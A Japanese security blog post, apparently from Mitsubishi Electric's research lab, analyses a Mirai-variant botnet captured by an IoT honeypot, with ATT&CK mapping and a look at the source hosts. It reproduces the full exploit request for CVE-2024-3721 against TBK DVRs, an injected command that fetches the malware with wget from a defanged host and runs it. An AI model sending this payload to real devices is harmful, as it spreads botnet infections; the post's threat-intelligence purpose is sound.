はじめに
こんにちは、三菱電機の大塚です。
三菱電機 情報技術総合研究所では、製品開発時のセキュリティ対策にフィードバックする目的で、複数種類のハニーポットを設置・運用しています。
運用しているハニーポットの1つに、IoT機器を応答機能に設置した「IoT家電ハニーポット」があります。これは、IoT機器の普及に伴い増加した「IoT家電を使用している家庭」を模擬しています。
ハニーポットでは、IoT家電を標的にした攻撃以外にも、さまざまなサイバー攻撃が観測できています。
今回は、IoT家電ハニーポットで観測し取得した、とある興味深いマルウェアについてご紹介します。
2つの特徴的な文字列
2025年9月13日~2025年9月23日の観測期間において、弊社のハニーポットでは、以下のリクエストを22件観測しました。
リクエストの内容としては、ペイロード内に挿入されたIPアドレス(XX[.]XX.XX.XX)からファイルを取得、実行するという、マルウェア感染を試みる攻撃として非常によくみられるプロセスです。
| URI |
|---|
| POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7.urbotnetisass%3B%20wget%20http%3A%2F%2FXX[.]XX.XX.XX%2Farm7.urbotnetisass%3B%20chmod%20777%20%2A%3B%20.%2Farm7.urbotnetisass%20tbk HTTP/1.1 |
本リクエストには、特徴的な文字列が2つあります。
- ___S_O_S_T_R_E_A_MAX___
- arm7.urbotnetisass
これらの文字列をヒントとして分析を行いました。
CVE-2024-3721とのつながり
CVE-2024-3721は、TBK社製DVR機器(DVR-4104, DVR-4216)に見つかった脆弱性1です。
ファイル「/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___」の処理に影響し、引数「mdb/mdc」を操作することにより、OSコマンドインジェクションが発生します。
本脆弱性を悪用したエクスプロイトコードは既に一般に公開されおり、遠隔から実行できることから、非常に高リスクの脆弱性です。
冒頭のURIには、CVE-2024-3721の影響範囲にあるファイル名および引数が使用されており、攻撃はCVE-2024-3721を悪用したものである可能性が高いといえます。
取得ファイルの挙動
URIによって取得されるarm7.urbotnetisassは、YaraルールでMiraiと診断されました。
解析の結果、確認できた挙動の一部は以下です。
- /procからCPU情報の読み取り
- arm以外のアーキテクチャ用ファイルの取得
- BusyBoxへの書き込み
挙動は、MITRE ATT&CK Tactics and Techniques2においては、表の通りに分類されます。
| Tactics | Techniques |
|---|---|
| Resource Development | T1064 Scripting |
| Execution | T1059 Command and Scripting Interpreter |
| Persistence | T1543.002 Systemd Service, T1064 Scripting |
| Privilege Escalation | T1543.002 Systemd Service |
| Defense Evasion | T1564.001 Hidden Files and Directories, T1027 Obfuscated Files or Information |
| Credential Access | T1003 OS Credential Dumping |
| Discovery | T1518.001 Security Software Discovery, T1082 System Information Discovery |
また、ファイルを実行すると「No bitches? No bare metal? No malware for you!」と表示されます。
攻撃者の意図は不明ですが、ChatGPT3に尋ねてみたところ、ネットスラングやミームが混ざっており、このような意味合いの可能性が高いとのことです。
「モテなくて、ガチな環境(ベアメタル)も持ってないようじゃ、マルウェア開発する資格なし!」
煽るような文言ですが、これをふまえると、不自然に見えていたファイル名の「urbotnetisass」も「your botnet is ass(お前のbotnetダメだな)」の意味合いの可能性が考えられますね。
攻撃元ホストについて
愉快犯のような名称のマルウェアファイルを取得させる、冒頭の攻撃リクエストは、2種類のホストから観測されました。
どちらもIPアドレスの下1桁以外は一致しており、同一ネットワークに属します。whois検索をしたところ、オランダのホスティングサービスのIPアドレスでした。
また、これらのホストからは、冒頭の攻撃リクエスト以外の攻撃リクエストも観測しました。それぞれの攻撃リクエストを確認したところ、リクエストの種類によってUser-Agent情報が異なることが確認できました。
User-Agent情報は偽装ができることから、この情報のみでホストの環境を特定することはできません。しかし、攻撃リクエストの種類によって違いがあるため、1つの攻撃ツールが実装されているのではなく、複数の攻撃ツールを使い分けて攻撃を行っている可能性が高いと考えられます。
おわりに
今回は、ハニーポットで取得したマルウェアについて分析を行いました。
CVE-2024-3721を悪用した攻撃であり、前回、投稿した記事(ハニーポット観測:新型ボットネット「RondoDox」ダウンローダファイルの分析)も同じ脆弱性を悪用したものでした。
CVE-2024-3721は2024年に公表された脆弱性ですが、高リスクかつエクスプロイトコードが公開されていることから、悪用する新しい攻撃が観測されています。
今後も引き続き、攻撃の動向を観測していきます。
参考文献
-
MITRE ATT&CK: https://attack.mitre.org/ ↩
-
OpenAI: https://openai.com/ja-JP/ ↩